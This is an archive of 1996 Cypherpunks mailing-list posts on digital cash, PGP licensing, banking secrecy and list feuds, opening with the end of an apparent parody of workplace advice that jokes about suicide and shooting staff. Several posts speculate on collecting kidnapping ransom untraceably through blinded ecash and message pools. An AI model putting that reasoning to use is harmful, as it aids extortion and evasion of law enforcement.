   "Then terrorize the mistalker: smile homicidally."

   + The Busybody

   Symptoms: These underlings are professional meddlers who
   believe they know everything. Usually they're wrong. They
   also like to drop in anytime to gossip and relate their
   latest "discovery."

   Action Plan: Visit with busybodies privately and get them
   to see how whispered charges can hurt the whole world. But
   don't act like a prosecutor dealing with a hostile witness.
   Set limits on people who take up too much of your time.
   Smile, smile, smile at them.

   + The Goldbricker

   Symptoms: This, says Dr. Kirschner, is the "Maybe" Person
   who talks a good game but usually doesn't produce. He or
   she "procrastinates in the hope that a better choice will
   present, itself," he says.

   Action Plan: Pinpoint objectives "tied down in advance with
   who-does-what-to-whom-and-by-when," advises Mr. Kahn. Clear
   up any points of misunderstanding about what you want. Also
   seek reasons behind the Goldbricker's actions. "Don't jump
   to the conclusion of shiftlessness," says Mr. Urbaniak,
   because the behavior may be "a disguise for an inability to
   live, a coverup for confusion about what's expected or,
   simply, fear." If the individual is bored with a
   repetitious life, additional or different lives may help,
   with a nudge toward suicide, smiling.

   + The "No" Person

   Symptoms: A perfectionist motivated to get every assignment
   right by avoiding mistakes. When things go wrong, the "No"
   Person loses hope and lets everyone know how she or he
   feels. " 'No' People have the uncanny ability to extinguish
   hope in others and smother creative sparks before they
   catch fire," says Dr. Kirschner.

   Action Plan: Have compassion instead of contempt -- and be
   patient. Use such people as a resource. They can be your
   personal character builders, and they can serve as an early
   warning system, say Dr. Kirschner. At one organization, the
   executive staff runs every new idea past its "No" Person
   for a critique before moving ahead. At another, when a "No"
   Person complained that all her associates were incompetent,
   her boss said, "You're right, let's take them all outside
   and shoot them " The "No" person smiled and then enthused,
   "OK, now you're talking, Malthus. Me first."

   [End]










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 16 Oct 1996 09:42:24 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: extortion via digital cash
In-Reply-To: <v03007808ae8a44011806@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.961016111923.28884E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 15 Oct 1996, Timothy C. May wrote:

> At 11:01 PM -0400 10/15/96, Rabid Wombat wrote:
> 
> >Also - in order to communicate back to the perpetrator, the victim needs
> >to communicate to the first step in the chain. The operator of that chain
> 
> BlackNet-type pools eliminate the chain. There is no "first step in the
> chain," only a message pool or Usenet group which is propagated to tens of
> thousands of sites around the world (and even available via one's satellite
> dish and local cable, a la DirectPC, @Home, etc.).

Yes, a large and widely distributed message pool would seem to be a way 
around this ...

> 
> 
> >and abetting a crime is another. What's to keep the authorities from
> >following the trail of crubs back to the perpetrator, other than the
> >usual threats of "don't call the cops" and "you have 24 hours to respond?"
> >A few hops through some generally uncooperative jurisdictions might do,
> >but perhaps El Dictator of Little Bannana Republic might just decide to
> >hold the perpetrator's "payment" hostage ...
> 
> Remailers, message pools, and untraceable cash are much more robust against
> these sorts of attacks than you are portraying here.

Yes, I suppose the actual transmission would be robust, if no mistakes 
were made. As you pointed out - if you can make the first hop secure (or 
any hop, for that matter).

The only problem is that you're the only one turning up w/ 
a sudden large ecash sumin the Cayman Islands (and that "clue" won't be 
there with wider use of ecash ...).
 

> 
> >
> >Sounds like the making of a good movie script. Can we get Tom Cruise and
> >one of those Thinking Machines laptops??  ;)
> 
> Hollywood is too naive. I was interviewed by a screenwriter who came to a
> Cypherpunks meeting, circa early 1994. She took copious notes and seemed
> very interested in these sorts of things. From the plot she was tentatively
> working on, I think the eventual outcome was "The Net," but it's possible
> her script never got made, or was used for background, or whatever. In any
> case, "The Net" (and "Hackers") had essentially nothing very sophisticated
> in it.

Perhaps we should write our own script. Can we get Attila to play "El 
Dictator"?  


-r.w.

 :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 16 Oct 1996 04:42:24 -0700 (PDT)
To: scottb@aca.ca
Subject: Re: extortion via digital cash
Message-ID: <199610160940.LAA20943@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


> Although Digicash's ecash offers anonymity to the payor it does not to the
> payee.  The reasons have to do with the way coins are blinded.  So LE
> could, with the bank's cooperation, easily associate the two sides of a
> transaction.  This was intentional on Chaum's part, either for moral or
> practical political considerations.  Its probably only a relatively minor
> patch to allow one ecash purse (the kidnapper's) to generate the blind
> token values so that another (similarly patched) purse (the vicitim's) can
> submit them to the mint and return the minted coins to the kidnapper (e.g.,
> by posting on a popular Usenet group).

Probably more than a minor patch, but doable nonetheless.

> In this scenario the only
> reasonable way left to track the money is via linkage (the size and timing
> of deposits and withdrawls in the kidnapper's account).

I can't see any reasonable way to track money obtained using the
double blind protocol - after all, the kidnapper does not even
need to have an account.

Best regards,

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 16 Oct 1996 08:42:15 -0700 (PDT)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <199610161232.HAA14016@mailhub.amaranth.com>
Message-ID: <Pine.SUN.3.94.961016112742.6095C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Oct 1996, William H. Geiger III wrote:

> In <Pine.SUN.3.94.961015211026.16787C-100000@polaris>, on 10/15/96 at 09:20 PM,
>    Black Unicorn <unicorn@schloss.li> said:
> 
> >On Mon, 14 Oct 1996, William H. Geiger III wrote:
> 
> >> In <Pine.SUN.3.94.961014035114.28315K-100000@polaris>, on 10/14/96 at 04:01 AM,
> >>    Black Unicorn <unicorn@schloss.li> said:
> 
> >> >Banking is as much about confidence as any business can be.  Anonymous or not, the
> >> >presence of funds which
> >> >infringe on regulations in one area or another are frightening to normal banking
> >> >customers.
> >> 
> >> BULL!!!!
> >> 
> >> There are only two things the banking customers care about:
> >> 
> >> 1. Will my money be there in the morning?
> >> 
> >> 2. What is my rate of return?
> 
> >Both of these are affected by large scandals at banks.
> 
> scandals=unwarranted media hype.
> 
> True scandals of interest to the investment & banking community are
> along the lines of fraud, theft, embezzlement, poor or risky investment.
> Items that directly relate to 1 & 2. The S&L debacle in the US during
> thethththe80's is a good example.
> 
> The rest is just crap to either:
> 
> A: Sell more newspapers, and/or
> 
> B: Increase government power.

Your point what that customers do not care.  I gave examples showing they
clearly do care.  The fact that disclosures of questionable banking l
practices cause customers to move their money is the active issue.  While
these may result in A and B above, that is entirely irrelevant.

> >In the case of the first example, runs on banks are hardly unheard of in relation to
> >major and even somewhat minor revelations about the source of deposit funds where
> >that source is criminal.  (Again, I cite Union Bank of Switzerland which saw a three
> >day run of almost $200 million after
> >disclosures about UBS accounts which were used for kidnapping randsom.
> >DeBeers was one depositor which explicitly attributed their account
> >closures to the news).
> 
> >The rate of return is directly affected by costs to the bank.  Legal costs (even in
> >Switzerland) of defending against government and private party discovery and
> >compelled disclosure are severe.  Need I even discuss the cost to the "legitimate"
> >BCCI account holder?
> 
> What about the cost to Switzerland's banking industry due to the fact
> that they nolonger uphold their investors anonyminity?? Their industry
> has lost Billions due to their cow-towing to US and other governments
>  snooping into investors accounts. What "cost" does that have to the
account holders of their banks??

I'm not sure why this has anything to do with my assertion that anonymous
money, when connected to regulation infringing conduct, tends to repell
banking customers with "legitimate" sources, except perhaps that you felt
you had to do a little grandstanding.  For the record I agree that
Switzerland's curtailing of banking secrecy has driven out some money, but
bear in mind that it has also brough a lot of money in.  To state, by the
way, that Switzerland no longer upholds investor anonyminity (or depositor
anonyminity) is an innaccuracy and an oversimplification.  This is not to
say that I like the trend, just pointing out that you have managed to skew
the facts.

> >And if customers are unconcerned about elements ther than #1 and #2,
> >why are such pains taken to invest in offshore institutions where the
> >costs (in sweat alone) can be higher?
> 
 > Because it is justified by avoiding government interference in their
 financial activities which in the long run increases their rate of return
 well above the added cost of doing so.

What connection might this have to the threat of increased regulation by
the banking authorities or the SBA due to large scale public disclosures
of questionable banking practices?  The answer is left as an exercise to
the student.
 
> >> The rest of it is a bunch of Govenment & Media hype & bull shit!!
> 
> >The above incidents are easily found with a quick trip to the library.
> 
> <sigh> Why  so I can re-read the unwarranted media & government attacks
on banking  institutions because, god forbid, they actually took someone's
money without  running them over the coals first. Dam those nasty banks
all to hell,  they don't report every transaction of their investors to
every government that may be interested.  

No, so you can verify that banks suffer losses following the disclosure of
questionable banking practices like randsom payoffs.

> >The bottom ne is that until anonyminity is not seen as some kind of
> >invariably criminal act with respect to banking, legitimate and
> >illegitimate money will be as like charged particles.
> 
> No the bottom line is money is money. Their is no  such thing as
"legitimate" or "illegitimate" money. Banks should  not be forced to play
policemen, their job is processing money.

Where, by the way, did I indicated otherwise?

And, incidently, the terms legitimate and illegitimate money are related,
in my view, only to the presence of regulation, not the moral or ethical
standing of the funds themselves.

> Next time, get a CLUE.

Given the woeful lack of facts and misconceptions you expose in your own
knowledge, I think you might wish to reconsider your own position and then
revisit the above line.

> >Next time, stick to web consulting.
>  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> Who died an made you  god of the banking industry?? Last time I looked
Walter Wriston was still  alive and well. :) (Incase you are too clueless
to know who that is I am sure a trip to your local library should help.)

Walter Wriston [sic] is in much disfavor in the banking industry just now.
Attempts at name dropping aside, my invitation for you to do a bit more
research on banking and the actual nature of anonymous banking is renewed.

> --
> -----------------------------------------------------------
> William H. Geiger III  http://www.amaranth.com/~whgiii

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 16 Oct 1996 11:54:39 -0700 (PDT)
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: extortion via digital cash
Message-ID: <v02130503ae8a7594f02a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <v02130503ae891eae8ee1@[10.0.2.15]>,
>Steve Schear <azur@netcom.com> wrote:
>>In this scenario the only
>>reasonable way left to track the money is via linkage (the size and timing
>>of deposits and withdrawls in the kidnapper's account).
>
>Who says the kidnapper has to have an account?
>

If the kidnapper doesn't have an account then they must launder it through
an accomplice (willing or not) in order to convert the money to any other
form.  Of course, if ecash becomes ubiquitous (which I think most on the
list truly desire, for any number of reasons) then, you're right, there's
no need to take value out of the ecash system exceppt for any purchasing
the goods and services one would in any case.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Amanda McLean <amanda@wineasy.se>
Date: Wed, 16 Oct 1996 02:57:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: http://www.cryptocard.com/cryptcomp.html
Message-ID: <3.0b33.32.19961016115636.00956dc0@mail.wineasy.se>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone played with the freeware Delphi crypto library at
http://www.cryptocard.com/cryptcomp.html? Is it any good?

A.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Betty G. O'Hearn" <betty@infowar.com>
Date: Wed, 16 Oct 1996 09:51:56 -0700 (PDT)
To: news_from_wschwartau@infowar.com
Subject: New On WWW.Infowar.Com  Vol.1  Issue #2
Message-ID: <1.5.4.32.19961016164555.00713cf8@mail.infowar.com>
MIME-Version: 1.0
Content-Type: text/plain


*******New On WWW.Infowar.Com  Take a look. Pass it on.*******


* Secretary Perry announces WHY MICROCHIPS CREATE MEGABANKS

* From ENN: DOD's Anti-Terrorism Conference Ft. Walton Beach,  FL

* Secretary Perry announces DOD to drop torture from training

* Congress Acts!?!? The complete text of the `Industrial Espionage Act of 1996'

* "The fictive environment of DoD infowar kooks"

* Call for Papers "Funding Opportunities in Information Technology,Culture,
and Social Institutions"

* "Cybergangs" On the Internet

*  Ft. McClellan General Announces Reserve Bio-War Unit

* Call for Papers 1997 IEEE Symposium on Security and Privacy

_______________________________________________________:)
Comments?  What would YOU like to see?  
Write to: list@infowar.com

Coming Soon:  New Discussion Group on IW   ( the first of several new
discussion groups)
_______________________________________________________:)

Infowar.com
Managed by Winn Schwartau
winn@infowar.com
http://www.infowar.com
813-393-6600  Voice
813-393-6361   Fax
_______________________________________________________:)
Content or Sponsor Opportunities ?
betty@infowar.com
813-367-7277   Voice
813-363-7277    Fax
_______________________________________________________:)


The Global Clearinghouse for Information Warfare and Information Security on
the Internet.

We thank our sponsors:

National Computer Security Association
OPEN SOURCE SOLUTIONS, Inc.
New Dimensions International - Security Training




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 16 Oct 1996 10:20:30 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Royalties
In-Reply-To: <v03007807ae8a130d973b@[207.167.93.63]>
Message-ID: <Pine.SCO.3.93.961016125929.11688E-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Oct 1996, Timothy C. May wrote:

> At 7:32 PM -0400 10/15/96, Mark O. Aldrich wrote:
> 
> >You cannot commercialize PGP whether you pay Ascom-Tech any royalties or
> >not.  Phil Zimmermann grated an exclusive license to ViaCrypt, Inc. a
> >number of years ago to be the sole commercial version of PGP.  In the mean
> >time, PGP Inc. was formed and has acquired ViaCrypt.  Thus, PGP Inc. now
> >holds the exclusive license on commercial PGP products.  Just by chance,
> >Phil Zimmermann is the CEO of PGP Inc.
> 
> It seems a bit strange that PGP Inc. is so fastidious about enforcing
> intellectual property claims, given the treatment of RSA Data Security
> Inc.'s similar property claims a few years ago.
> 

Is there, however, a notion of legitimacy here?  In other words, are PGP's
claims valid while RSA's are not?  I'm not talking under "The Law", but
under notions of what's good and what's not.  Many would assert that RSA's
IP claims are overstated, invalid, way too far reaching in scope, and that
they're being greedy bastards who are not telling the truth about what
happened with the agreement with Phil.  PGP, as far as I know, hasn't
started being "fastidious" about IP claims (in fact, I don't think their
position has changed at all), and bases their assertions on Phil's rather
straight-forward PGP license and his basic assertion that he owns the
rights to the encryption software called "PGP" and he don't want nobody
else selling it except he and his licensees.

(not taking sides here - just holding up one perspective for discussion)

> In other words, I don't worry for one nanosecond about "infringing" on PGP
> Inc.'s claimed property rights.

Not to pick a fight, but you generally take that position with most
IP rights, correct?  I _think_ you've voiced opinions that align with some
anti-copyright positions in the past, but I may be wrong.  Stepping aside
from that for the moment, why would you feel that PGP's property rights
are not respectable?

> 
> Nothing personal.
> 

Ditto.

------------------------------------------------------------------------- 
|some people get by                       |        Mark Aldrich         |
|with a little understanding              |   GRCI INFOSEC Engineering  |
|some people get by                       |     maldrich@grci.com       |
|with a whole lot more                    | MAldrich@dockmaster.ncsc.mil|
|               -- Sisters of Mercy       |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 16 Oct 1996 11:26:42 -0700 (PDT)
To: Cypherpunks Mailing List <cyberia-l@birds.wm.edu>
Subject: Censorship-related Web Sites?
Message-ID: <Pine.ULT.3.95.961016132428.2346A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

One of the professors in a different department is going to be doing a
symposium next week on censorship, with particular attention paid to
censorship and the internet.  She has asked me to whip up a quick web page
of resources that she can direct the participants too.

Unfortunately, beyond the basic (EFF, ACLU, CPSR) sites, I really don't
know of many good places to add in, and lack the time to do a thourgh
search. 

If you know of a site or three, can you take a moment to drop me an email
with them?  Would save a lot of time.

Thanks so much.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMmUM/TokqlyVGmCFAQFDawQAq3lMBg39gyDOwl/DW9GWeImui9S3ZnrJ
8YbNoqbcFWb+yAl9YOInp323nb9adh8D4zlvsyrs2+ZyziFMePyOkLLKO5K1kg5+
+ome1aLifyinjAHBGRLjbHMTU2vSP0znJeZzFZ65Q/z/ggucrXzN+gkwJbeeScad
ztq8ZAHdOo4=
=c6+G
-----END PGP SIGNATURE-----
 
Robert A. Hayden                        hayden@krypton.mankato.msus.edu
        -=-=-=-=-=-                              -=-=-=-=-=-
        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GED/J d-- s:++>: a- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 16 Oct 1996 10:59:26 -0700 (PDT)
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: [NOISE] I never knew that Dimitri Vulis was a net.legend
Message-ID: <Pine.SCO.3.93.961016133809.11688G-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


While the message blew by a little while ago (and I didn't save it),
someone had posted a URL with information about Dimitri's sordid/alleged
past on the Net.  At roughly the same time, I ran across (by accident) a
URL that lists Dimitri as a "net.legend" and offers yet another
perspective.  Apparently, Dimitri is far more well known that any of us
(at least me) gave him credit for.  The notion that the idiom "dandruff
covered" is indicative of anti-semitism is one passage that I found rather
amusing.

Check it out for yourself at
http://www.math.uiuc.edu/~tskirvin/home/legends/legends3.html

------------------------------------------------------------------------- 
|some people get by                       |        Mark Aldrich         |
|with a little understanding              |   GRCI INFOSEC Engineering  |
|some people get by                       |     maldrich@grci.com       |
|with a whole lot more                    | MAldrich@dockmaster.ncsc.mil|
|               -- Sisters of Mercy       |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 16 Oct 1996 13:09:15 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: WOW!
In-Reply-To: <NyquVD1w165w@bwalk.dm.com>
Message-ID: <199610161923.OAA10194@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Vulis says:
> bryce@digicash.com writes:
> > > > I already responded more times than this threat warranted
> > > Does anyone have any idea why Dimitri uses the term "threat"?  I 
> > > have not threatened Dimitri and I have indicated that as my guest 
> > > he will be under the mantle of my protection.  He'll be safer here 
> > > than he is in his own bed.
> > I believe he typo'ed "thread".
> Yes - I mistyped "thread". My apologies.
> Once again: I already replied to this _thread_, and then I received a
> _threat_ of a libel lawsuit in connection with this _threat_. Sorry
> for the typoes and the resulting confusion.
> At any rate, if people are really willing to pay this sort of money
> to hear me speak, perhaps I should make a videotape of me giving a
> presentation about my Usenet cancelbot and send it to Sandy?

      Good sir, allow me to point a few things out:

      1) It is late fall, almost winter. It gets _cold_ in Jersey, and it 
is WARM in California.

      2) You are being given a chance to go the bay area, at OTHERS expense,
and all you have to do is give little speech. 

      3) You are being asked to put your money where your mouth is, and you
don't even have to put up YOUR money. 

      4) Your reputation is going down, down down. About half the time you 
seem like an intelligent individual. The other half you act like a spoiled 
5 year old. If the latter half are forgeries, then I suggest PGP. You are 
being given a chance to regain your reputation. Take it.  


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@pc.jaring.my>
Date: Tue, 15 Oct 1996 17:22:47 -0700 (PDT)
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Royalties
In-Reply-To: <Pine.SCO.3.93.961015192159.9275D-100000@grctechs.va.grci.com>
Message-ID: <32648F4D.5F75@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Mark O. Aldrich wrote:
> You cannot commercialize PGP whether you pay Ascom-Tech any royalties or
> not.  Phil Zimmermann grated an exclusive license to ViaCrypt, Inc. a
> number of years ago to be the sole commercial version of PGP.  In the mean
> time, PGP Inc. was formed and has acquired ViaCrypt.  Thus, PGP Inc. now
> holds the exclusive license on commercial PGP products.

Even the international version of PGP?

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 16 Oct 1996 13:34:45 -0700 (PDT)
To: attila@primenet.com
Subject: Re: "Right to Privacy" and Crypto
In-Reply-To: <199610152205.QAA03946@infowest.com>
Message-ID: <199610161948.OAA10231@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Hun said:
> In <3.0b19.32.19961015115525.0067560c@panix.com>, on 10/15/96 
>    at 11:57 AM, Duncan Frissell <frissell@panix.com> said:
>         no they cannot physically torture, but they can put your 
>     intelligent, educated, civilized little white ass in with some some
>     real sweet boyfriends, or sadists, or racists who are just waiting
>     for revenge, or just plain killers "--oops, made a classification
>     error;" and the tag on your toe says: "john doe #1276549860"
> 
>         and nothing prevents them from talking about poor Harry who did 
>     not cooperate...

     And you still claim that AP has _no_ moral basis? 

     Is there more than one person using your account? 

     This may get me in a lot of shit, but if anyone _anyone_ treats a member
of _my_ family that way, Ohhhh shit, I'd _never_ get out of jail, assuming that
I make it that far. 

     I am not old enough to have served in Vietnam, but I did serve in the 
military, and I didn't do it to protect scumsucking politicians and shithead
sadist facist police. I did it for the college money, and because at one
point in my mis-guided youth I beleived in the constitution.

     I still think it's a good idea, and I realize that the great one-horned one
is probably right about the courts interpretation of the constitution. I also
realize that they have a certain vested interest in the status quo, and that
they had to _start_ with a certain mindset/attitude to get where their 
interpretations carry the weight that they do.  

> -."Note that many governments have officially given up rape and torture as
> -.sanctions.  (These were once universal.)  All we have to do is get them
> -.to give up murder, imprisonment, and robbery as sanctions and we'll have
> -.civilized them completely."
> -.
>         although I will certainly agree with your tongue-in-cheek 
>     comment...
> 
>         wish to check the cases of rape while in custody? --don't forget 
>     to include sodomy by bubba, foreign objects for women, etc.  did 
>     law enforcement do this?  indirectly, yes, by failing to protect the
>     accused.

     I think he was refering to geovernments in general, rather than _just
the US government (although I won't deny that it has happened here) the 
SS in germany certainly used rape and torture, and I'd bet it still goes 
on in certain countries. 

>         reinstate physical torture by the state --at least you'll live
>     through it!  they need you in court to parade as an example before
>     they hustle you off for reeducation.

     1) You might not live thru it, and if it was legal, then they _might_
be tempted to go just a little too far.

     2) I am really hoping that the above was sarcasm. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Willis <jmwillis@yooper.switch.rockwell.com>
Date: Wed, 16 Oct 1996 13:06:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RFC on "Assert Your Privacy"
Message-ID: <32654085.85D@switch.rockwell.com>
MIME-Version: 1.0
Content-Type: text/plain


We are in the process of revising our publication "Assert Your Privacy"
and we would like to have the benefit of your input (heah, what can I
say, I just joined the list).  The doc is generally intended for the
mass public and does not yet cover issues like e-cash, credit card
transactions over the net, etc..  I have yet to be convinced that a
critical mass has been reached to warrant inclusion of same.

So, please visit http://soli.inav.net/~dolphin/asrtpriv.htm and provide
feedback to the address indicated, or discuss it here!

I look forward to learning some things from ya'll!

Thanks,

John
Information Locators





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 16 Oct 1996 15:05:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [NOISE] I never knew that Dimitri Vulis was a net.legend
In-Reply-To: <Pine.SCO.3.93.961016133809.11688G-100000@grctechs.va.grci.com>
Message-ID: <v03007800ae8b1981d600@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


I avoid responding to Vulis' rants and raves, and his unusually
unimaginative schoolyard witticisms (the "Timmy May is a convicted child
molestor" stuff...I guess this is an example of Russian-style insults,
though I guess it's better than hammering one's shoe on a table).

However, Mark Aldrich's belated realization that Vulis is a certified
Kook-of-the-Month shows that not everyone may have understood my humor a
few months back. After several weeks of seeing Vulis' rants here, with his
strange insertions of the word "[spit]" after mentioning people's names,
and knowing full well his history as a ranter against "the Usenet Cabal,"
and with various odd, kooky comments about fellow Russian emigres, this is
why I composed my brief satire about Vulis (attached below, from
1996-07-17). I even labelled it as "satire," but, in true KOTM form, Vulis
declared that I was spreading slanderous lies in "the security community"
(I guess that's us?), and from thereon I was one of his main targets. Maybe
he thinks I'm another Sovok Tchurka emigre who changed his name to a
Western name so as to join the Illuminati Jew Usenet Cabal.

At 1:51 PM -0400 10/16/96, Mark O. Aldrich wrote:
>While the message blew by a little while ago (and I didn't save it),
>someone had posted a URL with information about Dimitri's sordid/alleged
>past on the Net.  At roughly the same time, I ran across (by accident) a
>URL that lists Dimitri as a "net.legend" and offers yet another
>perspective.  Apparently, Dimitri is far more well known that any of us
>(at least me) gave him credit for.  The notion that the idiom "dandruff
>covered" is indicative of anti-semitism is one passage that I found rather
>amusing.
>
>Check it out for yourself at
>http://www.math.uiuc.edu/~tskirvin/home/legends/legends3.html


Indeed, I knew full well about the "dandruff-covered" bit, and included it
in my satire (included below), probably from reading the KOTM FAQ on a
regular basis.

Anyway, now perhaps my satire will make more sense to some of you, who only
recently have learned just how strange and kooky Vulis (or whatever his
real name is) really is.

Here's my post from 1996-07-17:

*******

At 4:17 AM 7/18/96, Igor Chudov @ home wrote:

>Knowing KGB habits as pertaining to releasing information to the public,
>I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and
>maybe 10% truth that was already publicly available.
>
>It is like buying a CDROM about the history of the Net from Dr. Grubor.
>Maybe it would be interesting and amusing, but not worth $120.

NOW you tell me! I just shelled out $42 for "The History of the Net," by
Dr. John Grubor and Dr. Dmitri Vulis, 1996.

And here I thought it was the real history of the Net, especially the part
about how "the dandruff-covered Peter Vorobieff (spit) conspired with the
purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew
cripples dying of AIDS in Sovok-controlled clinics."

When Grubor and Vulis speak of the Usenet Cabal being a Sovok (spit) plot,
I thought this was the actual truth. I guess not. Maybe Spafford is
actually Rabbi Ruthenberg.

--Tim May

(hint: this a satire, based on the writings of Vulis, who speaks of people
as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches the
charming word "(spit)" after nearly every person he references.)


*********

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 16 Oct 1996 15:27:24 -0700 (PDT)
To: Marshall Clow <stan_gibson@zd.com
Subject: Re: Your editorial in the 10/14 PCWeek
In-Reply-To: <v03007800ae8ac25fee14@[207.67.246.99]>
Message-ID: <v03007801ae8b1f1f27d5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



[I'm leaving stan_gibson@zd.com on the distribution list, though this
letter is not meant to be a "letter to the editor" for PC Week. I just
disagree with some points Marshall Clow brings up, and feel Mr. Gibson
ought to get a copy of this, as he cc:ed the Cypherpunks on his letter.]

At 10:56 AM -0700 10/16/96, Marshall Clow wrote:
>Mr Gibson --
>
>I'm afraid that I must disagree with your editorial in the October 14th
>issue of PC Week titled "Encryption Law Change: Good News"
><http://www.pcweek.com/opinion/1014/14edit.html>. This is not a good
>change, but rather another attempt by the government to get it's "key
>escrow" (now renamed 'key recovery') agenda added to commercial software
>products.
>
>Let's start with the facts.
>
>A) This is not a change in the law. There is no law regarding export of
>encryption software.
>Congress has never passed any such law. These are State Department
>regulations, and presidential decrees. These regulations, which have the
>force of law to you and me, were never debated or voted upon by our
>elected representatives. They can be changed tomorrow the same way. In
>fact, they can be changed and the public need not even be notified.

Actually, as Greg Broiles pointed out in an article (on the Cypherpunks
list) several weeks ago, Congress deliberately chooses to delegate much
regulatory authority to other agencies. There just is not enough time or
expertise for them to pass specific laws covering the number and size of
trashcans in the national parks, the type of equipment to be used on Navy
ships, and so on. The State Department--and soon to be transferred to
Commerce--has the regulatory authority to decide which exports are covered
by the International Trafficking in Arms Regulations, the ITARs. These
rules effectively have the full force of law, as many tens of thousands of
laws not specifically passed by Congress have.

(It is true that the ITARs may well end up being overturned by the courts,
as the Bernstein and Junger cases proceed, but this could happen to laws
passed by Congress, and does.)

Also--and I am not an expert on this--some of the basis of the ITARs is
closely related to the "Munitions Act," which was, I am almost certain, an
actual Act of Congress, some decades back.

Certainly Congress knows full well what the ITARs are about, and could
change them if it thought the State Department or Commerce Department were
